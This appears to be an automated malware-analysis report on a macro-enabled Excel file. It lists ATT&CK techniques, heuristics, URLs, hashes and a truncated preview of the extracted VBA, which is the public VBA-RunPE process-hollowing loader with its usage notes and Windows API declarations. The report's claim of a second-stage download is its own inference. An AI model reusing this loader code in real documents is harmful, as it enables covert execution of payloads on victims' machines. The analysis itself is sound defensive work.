Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains VBA macros that reference cmd.exe and PowerShell, indicating an attempt to execute arbitrary commands or scripts. The embedded VBA code explicitly mentions the 'RunPE' technique and includes references to GitHub repositories related to this technique, suggesting the macro is designed to download and execute a second-stage payload. The presence of these elements strongly points towards a malicious document designed for payload delivery.
Heuristics (4)
- VBA project inside OOXML (medium, 2 related findings): OOXML_VBA. Document contains a VBA project; VBA macros present.
- PowerShell reference in VBA (critical): OLE_VBA_PS. PowerShell reference in VBA.
- cmd.exe reference in VBA (high): OLE_VBA_CMD. cmd.exe reference in VBA.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted URLs (all found in document text: OOXML body / shared strings):
- https://github.com/itm4n/VBA-RunPE
- https://github.com/hasherezade/
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspx
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspx
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspx
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.html
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspx
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspx
- https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.html
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspx
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html (second occurrence)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 53723 bytes | 2afb41fa8dbc0478b82810c719ff14e52ec7726f2b74484f85b7531a25f6c291 |
Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' --------------------------------------------------------------------------------
' Title: VBA RunPE
' Filename: RunPE.vba
' GitHub: https://github.com/itm4n/VBA-RunPE
' Date: 2019-12-14
' Author: Clement Labro (@itm4n)
' Description: A RunPE implementation in VBA with Windows API calls. It is
' compatible with both 32 bits and 64 bits versions of Microsoft Office.
' The 32 bits version of Office can only run 32 bits executables and the 64 bits
' version can only run 64 bits executables.
' Usage: 1. In the 'Exploit' procedure at the end of the code, set the path of the
' file you want to execute (with optional arguments)
' 2. Enable View > Immediate Window (Ctrl + G) (to check execution and error
' logs)
' 3. Run the macro!
' Tested on: - Windows 7 Pro 64 bits + Office 2016 32 bits
' - Windows 10 Pro 64 bits + Office 2016 64 bits
' Credit: @hasherezade - https://github.com/hasherezade/ (RunPE written in C++
' with dynamic relocations)
' --------------------------------------------------------------------------------
Option Explicit
' ================================================================================
' ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ResumeThread
```

... (preview truncated by the analyzer)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 118784 bytes | 899baae0adbf6edbc14933f38c0d1f4744d9f760ea0818f661ef439cd7ac6aaa |